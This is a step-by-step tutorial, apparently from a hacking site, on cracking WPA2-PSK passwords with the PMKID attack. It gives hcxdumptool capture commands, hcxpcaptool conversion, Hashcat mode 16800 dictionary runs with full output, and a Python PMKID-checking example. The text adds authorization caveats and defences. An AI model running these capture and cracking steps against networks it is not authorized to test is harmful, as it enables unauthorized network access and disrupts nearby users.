WPA2 Cracking Procedure - HashCat

Summary: This document describes a newer method for cracking WPA2-PSK passwords using Hashcat. It uses hcxdumptool (part of the hcxtools project) to capture the PMKID from the RSN IE of the first EAPOL frame an access point sends, without requiring a connected client. The PMKID is then converted into Hashcat's 16800 format and attacked with a wordlist, so no users have to be disconnected, unlike earlier WPA2 cracking techniques.


Cracking WPA2 Passwords Using the New PMKID Hashcat Attack

By Kody, 11/10/2018 4:25 AM, updated 02/01/2020 5:07 AM. Wi-Fi Hacking / Cyber Weapons Lab

Cracking the password for WPA2 networks has been roughly the same for
many years, but a newer attack requires less interaction and information than
previous techniques and has the added advantage of being able to target access
points with no one connected. The latest attack, against the PMKID, uses Hashcat
to crack WPA2-PSK passwords and lets attackers find networks with weak
passwords more easily.

The Old Way to Crack WPA2 Passwords


The old way of cracking WPA2 has been around for quite some time and involves
momentarily disconnecting a connected device from the access point we want
to try to crack, so that we can capture the four-way handshake when it
reconnects. That has two downsides, which are essential for Wi-Fi hackers to
understand.

The first downside is the requirement that someone is connected to the network
to attack it. The network password might be weak and very easy to break, but
without a connected device to briefly kick off, there is no opportunity to capture
a handshake, and thus no chance to try cracking it.


The second downside of this tactic is that it's noisy and legally troubling, in that
it forces you to send packets that deliberately disconnect an authorized user from
a service they are paying to use. This kind of unauthorized interference is
technically a denial-of-service attack and, if sustained, is equivalent to jamming
a network. It can get you into trouble and is easily detectable with the tools
covered in some of our previous guides.
A New Method of Password Cracking

Rather than relying on intercepting two-way communications between Wi-Fi
devices to try cracking the password, an attacker can communicate directly with
a vulnerable access point using the new method. On Aug. 4, 2018, a post on
the Hashcat forum detailed a new technique that targets the RSN IE (Robust
Security Network Information Element) of a single EAPOL frame: the first
message of the four-way handshake, which the access point sends as soon as any
client associates, can carry an optional PMKID field. For WPA2-PSK the PMKID is
an HMAC-SHA1 over the AP and client MAC addresses keyed with the PMK, and the
PMK itself is derived from the passphrase and SSID with PBKDF2, so a captured
PMKID is all that is needed to run an offline wordlist attack against the passphrase.

As with the previous attacks against WPA, the attacker must be in proximity
to the network they wish to attack. The objective will be to use a Kali-compatible
wireless network adapter to capture the information needed from the network to
try cracking the password. Rather than using Aireplay-ng or Aircrack-ng,
we'll be using a newer wireless attack tool set to do this, called hcxtools.


Using Hcxtools & Hashcat


hcxdumptool and hcxpcaptool are tools written for Wi-Fi auditing and
penetration testing, and they allow us to interact with nearby Wi-Fi networks to
capture WPA handshakes and PMKIDs. hcxdumptool works similarly to Besside-ng in
that it requires minimal arguments to start an attack from the command line, can
be run against either specific targets or targets of convenience, and can be
executed quickly over SSH on a Raspberry Pi or another device without a
screen.

Once the PMKID is captured, the next step is to load the hash into Hashcat and
attempt to crack the password. This is where hcxtools differs from Besside-ng,
in that a conversion step is required to prepare the file for Hashcat. We'll use
hcxpcaptool to convert our PCAPNG file into one Hashcat can work with,
leaving only the step of selecting a robust list of passwords for your cracking
attempts.

It's worth mentioning that not every network is vulnerable to this attack.
The PMKID is an optional field, intended for PMK caching and fast roaming, that
only some access points include, so you should not expect universal success with
this technique. Whether you can capture the PMKID depends on whether the access
point's firmware includes it in the RSN IE of its first EAPOL frame, and whether
you can crack the captured PMKID depends on whether the underlying passphrase is
contained in your wordlist. If either condition is not met, this attack will fail.
What You'll Need
To try this attack, you'll need to be running   Kali Linux   and have access to
a  wireless network adapter   that supports monitor mode and packet injection.
We have several guides about selecting a compatible wireless network adapter
below.


Aside from a Kali-compatible network adapter, make sure that you've fully
updated and upgraded your system. If you don't, some packages can be out of
date and cause issues while capturing.

Recommended: The Alfa AWUS036NHA 2.4 GHz

Step 1 Install hcxtools & Hashcat


First, we'll install the tools we need. To download them, type the following into a
terminal window.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...


remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Then, change into the directory and finish the installation with make and
then make install.

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c


cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c


cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

When it finishes installing, we'll move on to installing hcxtools. To do so, open a
new terminal window or leave the hcxdumptool directory, then install hcxtools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...


remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Next, change into its directory and run make and make install like before. If
you get a permission error, try prefixing the command with sudo.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o
hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o
hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o
hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool
hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o
wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac
whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o
hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o
wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o
hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o
hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o
hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o
hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o
hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o
wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o
wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o
wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o
wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o
wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o
wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o
wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o
wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool


install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Finally, we'll need to install Hashcat, which should be easy, as it's included in
the Kali Linux repo by default. Simply type the following to install the latest
packaged version of Hashcat.
~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done


Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer
required:
libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

With this complete, we can move on to setting up the wireless network adapter.

Step 2 Prepare the Wireless Network Adapter


After plugging in your Kali-compatible wireless network adapter, you can find
its name by typing ifconfig or ip a. Typically, it will be named something like
wlan0. The first step will be to put the card into monitor mode, allowing
us to listen in on Wi-Fi traffic in the immediate area.

To do this, type the following command into a terminal window, substituting the
name of your wireless network adapter for wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble


Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565


Wireless Network Adapter (rev 01)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on


[phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271
802.11n

Now, your wireless network adapter should have a name like "wlan0mon" and
be in monitor mode. You can confirm this by running ifconfig or iw dev again.
Take the warning about NetworkManager, wpa_supplicant and dhclient seriously:
run airmon-ng check kill first if you don't want them changing channels or
flipping the interface back to managed mode in the middle of a capture. The
author's capture below uses the second adapter from the list above, the AR9271,
as wlan1mon; substitute whatever interface name airmon-ng reported for yours.

Step 3 Use hcxdumptool to Capture PMKIDs from Local Networks


Now we are ready to capture the PMKIDs of the access points we want to try
attacking. With our wireless network adapter in monitor mode as "wlan1mon," we'll
execute the following command to begin the attack.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1

Breaking this down, -i tells the program which interface we are using, in this
case wlan1mon. The file we'll be saving the results to can be specified
with the -o flag. The channel we want to scan on can be indicated
with the -c flag followed by the number of the channel to scan; without it,
hcxdumptool hops between channels, which is why the channel number in the
brackets of the status lines below keeps changing.

In our command above, we're using wlan1mon to save captured PMKIDs to a
file called "galleria.pcapng." The --enable_status=1 flag prints a line for each
PMKID or handshake found; while you can specify another status value, I
haven't had success capturing with any value except 1.

One caveat a practitioner should know: hcxdumptool is not passive. It associates
with every access point in range using its own client MAC (the MAC CLIENT line
below) to provoke the first EAPOL frame, and by default it also attacks connected
clients and transmits deauthentication frames to collect ordinary handshakes,
which is exactly the noisy behavior this attack was supposed to avoid. If you
only want client-less PMKIDs, look in hcxdumptool --help for the options that
disable deauthentication and client attacks (their exact spelling varies between
versions), and only run any of this against networks you are authorized to test.

warning: NetworkManager is running with pid 555


warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)


INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new
client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................:
d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956
[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY
ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS,
EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED
HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED
HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS,
EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

When you've gathered enough, you can stop the program by pressing Control-C
to end the attack. This should produce a PCAPNG file containing the
information we need to attempt a cracking attack, but we will need to
convert it into a format Hashcat can understand.

Step 4 Use hcxpcaptool to Convert the Dump for Hashcat


To convert our PCAPNG file, we'll use hcxpcaptool with a few arguments
specified. In the same folder that your .pcapng file is saved, run the following
command in a terminal window.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

This command tells hcxpcaptool to write every PMKID it finds, in Hashcat's
16800 format, to the file named after -z, and the last part of the command is
the PCAPNG file we want to convert. The -E, -I, and -U flags are optional
extras: they write out every ESSID, EAP identity, and username seen in the
capture to the named files, which are handy as seed material for wordlists and
rules.

Running the command should show us the following.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriaHC.16800

Here, we can see we've gathered 21 PMKIDs in a short amount of time. Now
we can use the "galleriaHC.16800" file in Hashcat to try cracking network
passwords. If you are following along with a current hcxtools release, note that
hcxpcaptool has since been replaced by hcxpcapngtool, which writes a combined
PMKID/EAPOL file (-o capture.22000) for Hashcat's newer mode 22000; files
converted the way shown here are still accepted by mode 16800, which current
Hashcat releases keep around as a deprecated mode.


Step 5 Select a Password List & Attack with Hashcat


To start attacking the hashes we've captured, we'll need to pick a good
password list. You can find several good password lists to get started over
at the SecLists collection. Once you have a password list, put it in the same
folder as the .16800 file you just converted, and then run the following
command in a terminal window.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

In this command, we are starting Hashcat in mode 16800, which is the
WPA-PMKID-PBKDF2 hash type. Next, we specify the name of the file we want to
crack, in this case "galleriaHC.16800." The -a flag selects the attack mode;
-a 0 is a "straight" attack, meaning each wordlist entry is tried as-is, so this
is a dictionary attack rather than a true brute force. -w 4 selects the highest
workload profile, which gives Hashcat the most device time at the cost of a less
responsive desktop; if your computer suffers performance issues, lower the number
in the -w argument. --kernel-accel=1 pins the kernel's outer-loop parallelism to
1 instead of letting Hashcat autotune it; it is not a performance setting, and on
most hardware you are better off leaving it out.

Next, the --force option ignores any warnings and proceeds with the attack.
The Hashcat developers discourage it, because the warnings it suppresses
(unsupported OpenCL runtimes such as pocl, outdated drivers) can lead to silently
wrong results, so treat it as a last resort on a CPU-only box like the one used
here. The last part of the command specifies the password list we're using to
try against the PMKIDs in our file, in this case "topwifipass.txt."

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project


====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics,
2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13


rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8


Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.


Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Depending on your hardware speed and the size of your password list, this can
take quite some time to complete. To see the status at any time, you can press
the S key for an update.

Step 6 Interpret the Results


As Hashcat cracks away, you'll be able to check in as it progresses to see if any
keys have been recovered.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

When the password list is getting close to the end, Hashcat will automatically
adjust the workload and give you a final report when it's complete.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1
Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018


Stopped: Sun Oct 28 18:09:49 2018

If you've managed to crack any passwords, you'll see them here, and they are
also recorded in the potfile (~/.hashcat/hashcat.potfile by default), which you
can print later with hashcat -m 16800 --show galleriaHC.16800. In our test run,
none of the PMKIDs we gathered corresponded to passwords in our password list,
so we were unable to crack any of the hashes. This will most likely be your
result too against any networks with a strong password, but expect to see results
here for networks using a weak password.
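To make concrete what Steps 4 and 5 are actually doing, here is an added worked example (my own code, not from the article or from the hcxtools or Hashcat projects). It derives a PMKID the way a WPA2-PSK access point does, writes it in the PMKID*AP-MAC*client-MAC*ESSID-hex line format that hcxpcaptool -z produces and hashcat -m 16800 reads, filters a capture down to the one ESSID you are authorized to test, and then runs the same dictionary check Hashcat performs. The SSIDs, MAC addresses, passphrase and wordlist are constructed for the example (the client MAC reuses the value from the status output above), and the "neighbour" entry stands in for the uninvolved networks hcxdumptool sweeps up:

```python
"""What hashcat -m 16800 actually checks, end to end.

Added example with constructed data: the SSIDs, MAC addresses, passphrase and
wordlist below are hypothetical and not taken from a real capture.
"""
import hashlib
import hmac
from typing import Iterable, List, Optional, Tuple

# WPA/WPA2-PSK passphrase length limits (IEEE 802.11). Hashcat's 16800 kernel
# rejects candidates outside this range, which is what its "Rejected" counter
# and the "Minimum/Maximum password length supported by kernel" lines report.
MIN_PASSPHRASE = 8
MAX_PASSPHRASE = 63


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the expensive step (4096 HMAC-SHA1 rounds per candidate and per
    SSID) and the reason the CPU-only run above crawls along at ~64 H/s.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC).

    Nothing here depends on client traffic: the AP computes it from the PMK and
    the two MAC addresses and puts it in the RSN IE of EAPOL message 1.
    """
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def format_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """One hashcat -m 16800 line, as hcxpcaptool -z writes it:
    PMKID*AP-MAC*client-MAC*ESSID-as-hex."""
    return "*".join((pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()))


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex).decode())


def select_target(lines: Iterable[str], authorized_ssid: str) -> List[str]:
    """Keep only the hashes for the network you are authorized to test.

    hcxdumptool records every PMKID in range; cracking the neighbours' hashes
    is wasted GPU time at best and unauthorized access at worst.
    """
    return [line for line in lines if parse_16800(line)[3] == authorized_ssid]


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Straight-mode (-a 0) dictionary check of one 16800 line.

    Returns the passphrase that reproduces the captured PMKID, or None when the
    wordlist is exhausted, which matches hashcat's "Exhausted" status above.
    """
    pmkid, ap_mac, sta_mac, ssid = parse_16800(line)
    for cand in candidates:
        if not MIN_PASSPHRASE <= len(cand) <= MAX_PASSPHRASE:
            continue  # hashcat skips these too; they count as Rejected
        if hmac.compare_digest(compute_pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac), pmkid):
            return cand
    return None


# --- Constructed sample capture (hypothetical networks) ----------------------
STA_MAC = bytes.fromhex("fcc233ca8bc5")        # client MAC (hypothetical; same value as the status output)
TARGET_SSID = "galleria-lab"                   # the one network we are cleared to test
TARGET_AP_MAC = bytes.fromhex("c8b5adb615ea")
TARGET_PASSPHRASE = "moneyman1"                # weak, wordlist-style passphrase
NEIGHBOUR_SSID = "CoffeeShopWiFi"              # an uninvolved network in range
NEIGHBOUR_AP_MAC = bytes.fromhex("2c95694f3ca0")

TARGET_LINE = format_16800(
    compute_pmkid(derive_pmk(TARGET_PASSPHRASE, TARGET_SSID), TARGET_AP_MAC, STA_MAC),
    TARGET_AP_MAC, STA_MAC, TARGET_SSID)
NEIGHBOUR_LINE = format_16800(
    compute_pmkid(derive_pmk("not-in-any-wordlist-7x!", NEIGHBOUR_SSID), NEIGHBOUR_AP_MAC, STA_MAC),
    NEIGHBOUR_AP_MAC, STA_MAC, NEIGHBOUR_SSID)
CAPTURE_16800 = [NEIGHBOUR_LINE, TARGET_LINE]  # what galleriaHC.16800 would contain

# Tiny stand-in for topwifipass.txt; "1234567" is too short and gets rejected.
WORDLIST = ["1234567", "12345678", "password", "peter123", "moneyman1", "mercenary"]

if __name__ == "__main__":
    for entry in select_target(CAPTURE_16800, TARGET_SSID):
        print(entry)
        print("recovered:", crack_pmkid(entry, WORDLIST))
```

Running it prints the target's 16800 line followed by "recovered: moneyman1"; the neighbour's hash is never touched. Two things the numbers in the Hashcat output above now make sense of: PBKDF2 is salted with the SSID, so every distinct network in the file costs a full PBKDF2 run per candidate, which is why 4801 words against 20 unique salts gives a keyspace of 96020; and the 7-character entry is dropped before any hashing, which is where the "Rejected" count comes from.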

The PMKID Hashcat Attack Makes Wi-Fi Attacks Easier

While the new attack against Wi-Fi passwords makes it easier for hackers to
attempt an attack on a target, the same defenses that were effective against
previous types of WPA cracking remain effective. If your access point does not
include a PMKID in the RSN IE of its first EAPOL frame, this attack has no
chance of success. You can audit your own network with hcxtools to see if it is
susceptible to this attack.

Even if your network is vulnerable, a strong password is still the best defense
against an attacker gaining access to your Wi-Fi network using this or another
password cracking attack. Networks using WPA3-SAE are not exposed to this attack
at all: there the PMK comes out of the SAE key exchange rather than PBKDF2 over
the passphrase, so a captured PMKID cannot be checked offline against a wordlist.

Because these attacks rely on guessing the password the Wi-Fi network is
using, there are two common sources of guesses. The first is users
picking default or outrageously bad passwords, such as "12345678" or
"password." These will be cracked easily. The second source of password
guesses comes from data breaches that reveal millions of real user passwords.
Because many users reuse passwords between different types of accounts,
these lists tend to be very effective at cracking Wi-Fi networks.

I hope you enjoyed this guide to the new PMKID-based Hashcat attack on
WPA2 passwords! If you have any questions about this tutorial on Wi-Fi
password cracking or you have a comment, feel free to reach me on
Twitter @KodyKinzie.
